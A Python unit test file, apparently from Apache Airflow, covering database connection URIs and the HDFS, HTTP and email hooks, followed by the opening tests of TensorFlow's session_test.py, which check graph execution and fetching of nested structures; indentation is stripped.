class FakeHDFSHook(object):
def __init__(self, conn_id=None):
self.conn_id = conn_id
def get_conn(self):
client = FakeSnakeBiteClient()
return client
class ConnectionTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
utils.db.initdb()
os.environ['AIRFLOW_CONN_TEST_URI'] = (
'postgres://username:password@ec2.compute.com:5432/the_database')
os.environ['AIRFLOW_CONN_TEST_URI_NO_CREDS'] = (
'postgres://ec2.compute.com/the_database')
def tearDown(self):
env_vars = ['AIRFLOW_CONN_TEST_URI', 'AIRFLOW_CONN_AIRFLOW_DB']
for ev in env_vars:
if ev in os.environ:
del os.environ[ev]
def test_using_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
def test_using_unix_socket_env_var(self):
c = SqliteHook.get_connection(conn_id='test_uri_no_creds')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertIsNone(c.login)
self.assertIsNone(c.password)
self.assertIsNone(c.port)
def test_param_setup(self):
c = models.Connection(conn_id='local_mysql', conn_type='mysql',
host='localhost', login='airflow',
password='airflow', schema='airflow')
self.assertEqual('localhost', c.host)
self.assertEqual('airflow', c.schema)
self.assertEqual('airflow', c.login)
self.assertEqual('airflow', c.password)
self.assertIsNone(c.port)
def test_env_var_priority(self):
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertNotEqual('ec2.compute.com', c.host)
os.environ['AIRFLOW_CONN_AIRFLOW_DB'] = \
'postgres://username:password@ec2.compute.com:5432/the_database'
c = SqliteHook.get_connection(conn_id='airflow_db')
self.assertEqual('ec2.compute.com', c.host)
self.assertEqual('the_database', c.schema)
self.assertEqual('username', c.login)
self.assertEqual('password', c.password)
self.assertEqual(5432, c.port)
del os.environ['AIRFLOW_CONN_AIRFLOW_DB']
def test_dbapi_get_uri(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', hook.get_uri())
conn2 = BaseHook.get_connection(conn_id='test_uri_no_creds')
hook2 = conn2.get_hook()
self.assertEqual('postgres://ec2.compute.com/the_database', hook2.get_uri())
def test_dbapi_get_sqlalchemy_engine(self):
conn = BaseHook.get_connection(conn_id='test_uri')
hook = conn.get_hook()
engine = hook.get_sqlalchemy_engine()
self.assertIsInstance(engine, sqlalchemy.engine.Engine)
self.assertEqual('postgres://username:password@ec2.compute.com:5432/the_database', str(engine.url))
def test_get_connections_env_var(self):
conns = SqliteHook.get_connections(conn_id='test_uri')
assert len(conns) == 1
assert conns[0].host == 'ec2.compute.com'
assert conns[0].schema == 'the_database'
assert conns[0].login == 'username'
assert conns[0].password == 'password'
assert conns[0].port == 5432
def test_get_connections_db(self):
conns = BaseHook.get_connections(conn_id='airflow_db')
assert len(conns) == 1
assert conns[0].host == 'localhost'
assert conns[0].schema == 'airflow'
assert conns[0].login == 'root'
class WebHDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
def test_simple_init(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook()
self.assertIsNone(c.proxy_user)
def test_init_proxy_user(self):
from airflow.hooks.webhdfs_hook import WebHDFSHook
c = WebHDFSHook(proxy_user='someone')
self.assertEqual('someone', c.proxy_user)
try:
from airflow.hooks.hdfs_hook import HDFSHook
import snakebite
except ImportError:
HDFSHook = None
@unittest.skipIf(HDFSHook is None,
"Skipping test because HDFSHook is not installed")
class HDFSHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
os.environ['AIRFLOW_CONN_HDFS_DEFAULT'] = ('hdfs://localhost:8020')
def test_get_client(self):
client = HDFSHook(proxy_user='foo').get_conn()
self.assertIsInstance(client, snakebite.client.Client)
self.assertEqual('localhost', client.host)
self.assertEqual(8020, client.port)
self.assertEqual('foo', client.service.channel.effective_user)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_autoconfig_client(self, mock_get_connections,
MockAutoConfigClient):
c = models.Connection(conn_id='hdfs', conn_type='hdfs',
host='localhost', port=8020, login='foo',
extra=json.dumps({'autoconfig': True}))
mock_get_connections.return_value = [c]
HDFSHook(hdfs_conn_id='hdfs').get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user='foo',
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.AutoConfigClient')
def test_get_autoconfig_client_no_conn(self, MockAutoConfigClient):
HDFSHook(hdfs_conn_id='hdfs_missing', autoconfig=True).get_conn()
MockAutoConfigClient.assert_called_once_with(effective_user=None,
use_sasl=False)
@mock.patch('airflow.hooks.hdfs_hook.HDFSHook.get_connections')
def test_get_ha_client(self, mock_get_connections):
c1 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost', port=8020)
c2 = models.Connection(conn_id='hdfs_default', conn_type='hdfs',
host='localhost2', port=8020)
mock_get_connections.return_value = [c1, c2]
client = HDFSHook().get_conn()
self.assertIsInstance(client, snakebite.client.HAClient)
try:
from airflow.hooks.http_hook import HttpHook
except ImportError:
HttpHook = None
@unittest.skipIf(HttpHook is None,
"Skipping test because HttpHook is not installed")
class HttpHookTest(unittest.TestCase):
def setUp(self):
configuration.load_test_config()
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='http')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='localhost', schema='https')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_http_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='http://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'http://localhost')
@mock.patch('airflow.hooks.http_hook.HttpHook.get_connection')
def test_host_encoded_https_connection(self, mock_get_connection):
c = models.Connection(conn_id='http_default', conn_type='http',
host='https://localhost')
mock_get_connection.return_value = c
hook = HttpHook()
hook.get_conn({})
self.assertEqual(hook.base_url, 'https://localhost')
send_email_test = mock.Mock()
class EmailTest(unittest.TestCase):
def setUp(self):
configuration.conf.remove_option('email', 'EMAIL_BACKEND')
@mock.patch('airflow.utils.email.send_email')
def test_default_backend(self, mock_send_email):
res = utils.email.send_email('to', 'subject', 'content')
mock_send_email.assert_called_with('to', 'subject', 'content')
self.assertEqual(mock_send_email.return_value, res)
@mock.patch('airflow.utils.email.send_email_smtp')
def test_custom_backend(self, mock_send_email):
configuration.conf.set('email', 'EMAIL_BACKEND', 'tests.core.send_email_test')
utils.email.send_email('to', 'subject', 'content')
send_email_test.assert_called_with(
'to', 'subject', 'content', files=None, dryrun=False,
cc=None, bcc=None, mime_charset='us-ascii', mime_subtype='mixed')
self.assertFalse(mock_send_email.called)
class EmailSmtpTest(unittest.TestCase):
def setUp(self):
configuration.conf.set('smtp', 'SMTP_SSL', 'False')
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name])
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
filename = u'attachment; filename="' + os.path.basename(attachment.name) + '"'
self.assertEqual(filename, msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_smtp_with_multibyte_content(self, mock_send_mime):
utils.email.send_email_smtp('to', 'subject', '🔥', mime_charset='utf-8')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
msg = call_args[2]
mimetext = MIMEText('🔥', 'mixed', 'utf-8')
self.assertEqual(mimetext.get_payload(), msg.get_payload()[0].get_payload())
@mock.patch('airflow.utils.email.send_MIME_email')
def test_send_bcc_smtp(self, mock_send_mime):
attachment = tempfile.NamedTemporaryFile()
attachment.write(b'attachment')
attachment.seek(0)
utils.email.send_email_smtp('to', 'subject', 'content', files=[attachment.name], cc='cc', bcc='bcc')
self.assertTrue(mock_send_mime.called)
call_args = mock_send_mime.call_args[0]
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), call_args[0])
self.assertEqual(['to', 'cc', 'bcc'], call_args[1])
msg = call_args[2]
self.assertEqual('subject', msg['Subject'])
self.assertEqual(configuration.conf.get('smtp', 'SMTP_MAIL_FROM'), msg['From'])
self.assertEqual(2, len(msg.get_payload()))
self.assertEqual(u'attachment; filename="' + os.path.basename(attachment.name) + '"',
msg.get_payload()[-1].get(u'Content-Disposition'))
mimeapp = MIMEApplication('attachment')
self.assertEqual(mimeapp.get_payload(), msg.get_payload()[-1].get_payload())
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime(self, mock_smtp, mock_smtp_ssl):
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
msg = MIMEMultipart()
utils.email.send_MIME_email('from', 'to', msg, dryrun=False)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertTrue(mock_smtp.return_value.starttls.called)
mock_smtp.return_value.login.assert_called_with(
configuration.conf.get('smtp', 'SMTP_USER'),
configuration.conf.get('smtp', 'SMTP_PASSWORD'),
)
mock_smtp.return_value.sendmail.assert_called_with('from', 'to', msg.as_string())
self.assertTrue(mock_smtp.return_value.quit.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_ssl(self, mock_smtp, mock_smtp_ssl):
configuration.conf.set('smtp', 'SMTP_SSL', 'True')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp.called)
mock_smtp_ssl.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_noauth(self, mock_smtp, mock_smtp_ssl):
configuration.conf.remove_option('smtp', 'SMTP_USER')
configuration.conf.remove_option('smtp', 'SMTP_PASSWORD')
mock_smtp.return_value = mock.Mock()
mock_smtp_ssl.return_value = mock.Mock()
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=False)
self.assertFalse(mock_smtp_ssl.called)
mock_smtp.assert_called_with(
configuration.conf.get('smtp', 'SMTP_HOST'),
configuration.conf.getint('smtp', 'SMTP_PORT'),
)
self.assertFalse(mock_smtp.login.called)
@mock.patch('smtplib.SMTP_SSL')
@mock.patch('smtplib.SMTP')
def test_send_mime_dryrun(self, mock_smtp, mock_smtp_ssl):
utils.email.send_MIME_email('from', 'to', MIMEMultipart(), dryrun=True)
self.assertFalse(mock_smtp.called)
self.assertFalse(mock_smtp_ssl.called)
if __name__ == '__main__':
unittest.main()
|
session_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import random
import os
import sys
import threading
import time
import warnings
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as framework_device_lib
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
# Import gradients to resolve circular imports
from tensorflow.python.ops import gradients # pylint: disable=unused-import
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import math_ops
# Import resource_variable_ops for the variables-to-tensor implicit conversion.
from tensorflow.python.ops import resource_variable_ops # pylint: disable=unused-import
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
# NOTE(mrry): Dummy shape registration for ops used in the tests, since they
# don't have C++ op registrations on which to attach C++ shape fns.
ops.RegisterShape('ConstructionFails')(common_shapes.unknown_shape)
class SessionTest(test_util.TensorFlowTestCase):
def setUp(self):
super(SessionTest, self).setUp()
warnings.simplefilter('always')
def testUseExistingGraph(self):
with ops.Graph().as_default() as g, ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session(graph=g):
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testUseDefaultGraph(self):
with ops.Graph().as_default(), ops.device('/cpu:0'):
a = constant_op.constant(6.0, shape=[1, 1])
b = constant_op.constant(7.0, shape=[1, 1])
c = math_ops.matmul(a, b, name='matmul')
with session.Session():
result = c.eval()
self.assertAllEqual(result, [[42.0]])
def testCreate(self):
with session.Session():
inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
copy = array_ops.identity(inp)
# Test with feed.
# TODO(mrry): Investigate why order='F' didn't work.
arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
copy_val = copy.eval({'W1:0': arr})
self.assertAllEqual(arr, copy_val)
# Test without feed.
copy_val = copy.eval()
self.assertAllEqual(
np.asarray(
[[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]], dtype=np.float32),
copy_val)
def testManyCPUs(self):
with session.Session(
config=config_pb2.ConfigProto(device_count={
'CPU': 2, 'GPU': 0
})) as sess:
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
num_cpu_devices = 0
num_gpu_devices = 0
for device in sess.list_devices():
device_type = framework_device_lib.DeviceSpec.from_string(
device.name).device_type
if device_type == 'CPU':
num_cpu_devices += 1
elif device_type == 'GPU':
num_gpu_devices += 1
self.assertEqual(2, num_cpu_devices)
self.assertEqual(0, num_gpu_devices)
def testPerSessionThreads(self):
with session.Session(
config=config_pb2.ConfigProto(use_per_session_threads=True)):
inp = constant_op.constant(10.0, name='W1')
self.assertAllEqual(inp.eval(), 10.0)
def testSessionInterOpThreadPool(self):
config = config_pb2.ConfigProto()
pool = config.session_inter_op_thread_pool.add()
with session.Session(config=config) as s:
inp = constant_op.constant(10.0, name='W1')
results = s.run([inp])
self.assertAllEqual([10.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
with session.Session(config=config) as s:
inp = constant_op.constant(20.0, name='W2')
results = s.run([inp])
self.assertAllEqual([20.0], results)
pool = config.session_inter_op_thread_pool.add()
pool.num_threads = 1
pool.global_name = 't1'
run_options = config_pb2.RunOptions()
run_options.inter_op_thread_pool = (
len(config.session_inter_op_thread_pool) - 1)
with session.Session(config=config) as s:
inp = constant_op.constant(30.0, name='W2')
results = s.run([inp], options=run_options)
self.assertAllEqual([30.0], results)
def testErrorsReported(self):
with session.Session() as s:
constant_op.constant(10.0, name='W1')
with self.assertRaises(ValueError):
s.run('foo:0')
def testErrorPayload(self):
with session.Session():
a = array_ops.placeholder(dtypes.float32)
with self.assertRaisesOpError(lambda e: e.op == a.op):
a.eval()
def testErrorCodeWithNoNodeDef(self):
with session.Session() as s:
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
def exc_predicate(e):
return (e.op is None and e.node_def is None and
e.error_code == error_codes_pb2.INVALID_ARGUMENT)
with self.assertRaisesOpError(exc_predicate):
# Run with a bogus handle.
s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
def testErrorBasedOn(self):
with session.Session() as sess:
a = constant_op.constant(0.0, shape=[2, 3])
# NOTE(mrry): The original_op is nonsense, but used here to test that the
# errors are reported correctly.
with sess.graph._original_op(a.op):
b = array_ops.identity(a, name='id')
with sess.graph._original_op(b.op):
c = array_ops.placeholder(dtypes.float32)
def exc_predicate(e):
return (e.op == c.op and e.op._original_op == b.op and
e.op._original_op._original_op == a.op)
with self.assertRaisesOpError(exc_predicate):
c.eval()
def testFetchNone(self):
with session.Session() as s:
a = constant_op.constant(1.0)
with self.assertRaises(TypeError):
s.run(None)
with self.assertRaises(TypeError):
s.run([None])
with self.assertRaises(TypeError):
s.run({'b': None})
with self.assertRaises(TypeError):
s.run({'a': a, 'b': None})
def testFetchSingleton(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
tensor_runner = sess.make_callable(a)
res = tensor_runner()
self.assertEqual(42.0, res)
op_runner = sess.make_callable(a.op)
res = op_runner()
self.assertEqual(None, res)
def testFetchSingletonByName(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
res = sess.run(a.name)
self.assertEqual(42.0, res)
res = sess.run(a.op) # An op, not a tensor.
self.assertEqual(None, res)
def testFetchList(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
v = variables.Variable([54.0])
assign = v.assign([63.0])
res = sess.run([a, b, c, a.name, assign.op])
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
list_runner = sess.make_callable([a, b, c, a.name, assign.op])
res = list_runner()
self.assertTrue(isinstance(res, list))
self.assertEqual([42.0, None, 44.0, 42.0, None], res)
def testFetchTuple(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run((a, b, c, a.name))
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
tuple_runner = sess.make_callable((a, b, c, a.name))
res = tuple_runner()
self.assertTrue(isinstance(res, tuple))
self.assertEqual((42.0, None, 44.0, 42.0), res)
def testFetchNamedTuple(self):
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
# pylint: enable=invalid-name
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(ABC(a, b, c))
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
namedtuple_runner = sess.make_callable(ABC(a, b, c))
res = namedtuple_runner()
self.assertTrue(isinstance(res, ABC))
self.assertEqual(42.0, res.a)
self.assertEqual(None, res.b)
self.assertEqual(44.0, res.c)
def testFetchDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run({'a': a, 'b': b, 'c': c})
self.assertTrue(isinstance(res, dict))
self.assertEqual(42.0, res['a'])
self.assertEqual(None, res['b'])
self.assertEqual(44.0, res['c'])
def testFetchOrderedDict(self):
with session.Session() as sess:
a = constant_op.constant(42.0)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(44.0)
res = sess.run(collections.OrderedDict([(3, a), (2, b), (1, c)]))
self.assertTrue(isinstance(res, collections.OrderedDict))
self.assertEqual([3, 2, 1], list(res.keys()))
self.assertEqual(42.0, res[3])
self.assertEqual(None, res[2])
self.assertEqual(44.0, res[1])
def testFetchAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field1 = attr.ib()
field2 = attr.ib()
val1 = np.array([1.2, 3.4, 5.6])
val2 = np.array([[1, 2], [4, 3]])
val3 = np.array([10, 20, 30])
t1 = constant_op.constant(val1)
t2 = constant_op.constant(val2)
sample = SampleAttr(t1, t2)
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val1, result.field1)
self.assertAllEqual(val2, result.field2)
result = sess.run(sample, feed_dict={sample.field1: val3})
self.assertIsInstance(result, SampleAttr)
self.assertAllEqual(val3, result.field1)
self.assertAllEqual(val2, result.field2)
def testFetchNestedAttrs(self):
if attr is None:
self.skipTest('attr module is unavailable.')
@attr.s
class SampleAttr(object):
field0 = attr.ib()
field1 = attr.ib()
v1 = 10
v2 = 20
v3 = np.float32(1.2)
v4 = np.float32(3.4)
v5 = np.float64(100.001)
v6 = np.float64(-23.451)
arr1 = np.array([1.2, 6.7, 3.4])
arr2 = np.array([7, 11, 3])
sample = SampleAttr(
SampleAttr(
SampleAttr(constant_op.constant(v1), constant_op.constant(v2)),
SampleAttr(constant_op.constant(arr1), constant_op.constant(arr2))),
{'A': SampleAttr(constant_op.constant(v3), constant_op.constant(v4)),
'B': [SampleAttr(constant_op.constant(v5), constant_op.constant(v6))]})
with session.Session() as sess:
result = sess.run(sample)
self.assertIsInstance(result, SampleAttr)
self.assertIsInstance(result.field0, SampleAttr)
self.assertIsInstance(result.field0.field0, SampleAttr)
self.assertIsInstance(result.field0.field1, SampleAttr)
self.assertIsInstance(result.field0.field1.field0, np.ndarray)
self.assertAllEqual(arr1, result.field0.field1.field0)
self.assertIsInstance(result.field0.field1.field1, np.ndarray)
self.assertAllEqual(arr2, result.field0.field1.field1)
self.assertIsInstance(result.field1, dict)
self.assertIn('A', result.field1)
self.assertIn('B', result.field1)
self.assertIsInstance(result.field1['A'], SampleAttr)
self.assertAllEqual(
[v3, v4],
[result.field1['A'].field0, result.field1['A'].field1])
self.assertIsInstance(result.field1['B'], list)
self.assertEqual(1, len(result.field1['B']))
self.assertIsInstance(result.field1['B'][0], SampleAttr)
self.assertAllEqual(
[v5, v6],
[result.field1['B'][0].field0, result.field1['B'][0].field1])
def testFetchNestingEmptyOneLevel(self):
with session.Session() as sess:
a_val = 11.0
a = constant_op.constant(a_val)
res = sess.run([[], tuple(), {}])
self.assertTrue(isinstance(res, list))
self.assertEquals(3, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
res = sess.run([[], tuple(), {}, a])
self.assertTrue(isinstance(res, list))
self.assertEquals(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(0, len(res[0]))
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(0, len(res[1]))
self.assertTrue(isinstance(res[2], dict))
self.assertEqual(0, len(res[2]))
self.assertEqual(a_val, res[3])
def testFetchNestingOneLevel(self):
with session.Session() as sess:
# pylint: disable=invalid-name
ABC = collections.namedtuple('ABC', ['a', 'b', 'c'])
DEFG = collections.namedtuple('DEFG', ['d', 'e', 'f', 'g'])
# pylint: enable=invalid-name
a_val = 42.0
b_val = None
c_val = 44.0
a = constant_op.constant(a_val)
b = control_flow_ops.no_op() # An op, not a tensor.
c = constant_op.constant(c_val)
# List of lists, tuples, namedtuple, and dict
res = sess.run([[a, b, c], (a, b, c),
ABC(a=a, b=b, c=c), {
'a': a.name,
'c': c,
'b': b
}])
self.assertTrue(isinstance(res, list))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Tuple of lists, tuples, namedtuple, and dict
res = sess.run(([a, b, c], (a.name, b, c), ABC(a=a, b=b, c=c), {
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, tuple))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res[0], list))
self.assertEqual(3, len(res[0]))
self.assertEqual(a_val, res[0][0])
self.assertEqual(b_val, res[0][1])
self.assertEqual(c_val, res[0][2])
self.assertTrue(isinstance(res[1], tuple))
self.assertEqual(3, len(res[1]))
self.assertEqual(a_val, res[1][0])
self.assertEqual(b_val, res[1][1])
self.assertEqual(c_val, res[1][2])
self.assertTrue(isinstance(res[2], ABC))
self.assertEqual(a_val, res[2].a)
self.assertEqual(b_val, res[2].b)
self.assertEqual(c_val, res[2].c)
self.assertTrue(isinstance(res[3], dict))
self.assertEqual(3, len(res[3]))
self.assertEqual(a_val, res[3]['a'])
self.assertEqual(b_val, res[3]['b'])
self.assertEqual(c_val, res[3]['c'])
# Namedtuple of lists, tuples, namedtuples, and dict
res = sess.run(
DEFG(
d=[a, b, c],
e=(a, b, c),
f=ABC(a=a.name, b=b, c=c),
g={
'a': a,
'c': c,
'b': b
}))
self.assertTrue(isinstance(res, DEFG))
self.assertTrue(isinstance(res.d, list))
self.assertEqual(3, len(res.d))
self.assertEqual(a_val, res.d[0])
self.assertEqual(b_val, res.d[1])
self.assertEqual(c_val, res.d[2])
self.assertTrue(isinstance(res.e, tuple))
self.assertEqual(3, len(res.e))
self.assertEqual(a_val, res.e[0])
self.assertEqual(b_val, res.e[1])
self.assertEqual(c_val, res.e[2])
self.assertTrue(isinstance(res.f, ABC))
self.assertEqual(a_val, res.f.a)
self.assertEqual(b_val, res.f.b)
self.assertEqual(c_val, res.f.c)
self.assertTrue(isinstance(res.g, dict))
self.assertEqual(3, len(res.g))
self.assertEqual(a_val, res.g['a'])
self.assertEqual(b_val, res.g['b'])
self.assertEqual(c_val, res.g['c'])
# Dict of lists, tuples, namedtuples, and dict
res = sess.run({
'd': [a, b, c],
'e': (a, b, c),
'f': ABC(a=a, b=b, c=c),
'g': {
'a': a.name,
'c': c,
'b': b
}
})
self.assertTrue(isinstance(res, dict))
self.assertEqual(4, len(res))
self.assertTrue(isinstance(res['d'], list))
self.assertEqual(3, len(res['d']))
self.assertEqual(a_val, res['d'][0])
self.assertEqual(b_val, res['d'][1])
self.assertEqual(c_val, res['d'][2])
self.assertTrue(isinstance(res['e'], tuple))
self.assertEqual(3, len(res['e']))
self.assertEqual(a_val, res['e'][0])
self.assertEqual(b_val, res['e'][1])
self.assertEqual(c_val, res['e'][2])
self.assertTrue(isinstance(res['f'], ABC))
self.assertEqual(a_val, res['f'].a)
self.assertEqual(b_val, res['f'].b)
self.assertEqual(c_val, res['f'].c)
self.assertTrue(isinstance(res['g'], dict))
self.assertEqual(3, len(res['g']))
self.assertEqual(a_val, res['g']['a'])
self.assertEqual(b_val, res['g']['b'])
self.assertEqual(c_val, res['g']['c'])
def testFetchTensorObject(self):
with session.Session() as s:
a = constant_op.constant(1.0, shape=[1, 2])
b = constant_op.constant(2.0, shape=[2, 3])
c = math_ops.matmul(a, b)
results_with_list = s.run([c])
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_list[0])
results_with_single = s.run(c)
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_single)
results_with_get = c.eval()
self.assertAllEqual([[4.0, 4.0, 4.0]], results_with_get)
a_val, b_val = s.run([a, b]) # Test multiple fetches.
self.assertAllEqual([[1.0, 1.0]], a_val)
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]], b_val)
results_with_dict = s.run({'a': [a], 'b': b, 'z': [a, b]})
self.assertAllEqual([[1.0, 1.0]], results_with_dict['a'][0])
self.assertAllEqual([[2.0, 2.0, 2.0], [2.0, 2.0, 2.0]],
results_with_dict['b'])
self.assertAllEqual(results_with_dict['a'][0], results_with_dict['z'][0])
self.assertAllEqual(results_with_dict['b'], results_with_dict['z'][1])
# Test nested structures
results_with_nested_list = s.run([[[a, b], b], a, [a, b]])
